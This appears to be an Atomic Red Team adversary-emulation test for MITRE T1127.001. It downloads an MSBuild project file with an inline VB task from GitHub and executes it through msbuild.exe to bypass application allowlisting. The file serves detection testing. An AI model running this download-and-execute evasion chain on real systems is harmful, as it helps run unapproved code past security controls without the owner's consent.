#TechniqueName: Trusted Developer Utilities Proxy Execution: MSBuild
#AtomicTestName: MSBuild Bypass Using Inline Tasks (VB)
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1127.001\src\vb.xml) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "PathToAtomicsFolder\T1127.001\src\vb.xml"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1127.001\src\vb.xml) {exit 0} else {exit 1}


#commands
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe PathToAtomicsFolder\T1127.001\src\vb.xml

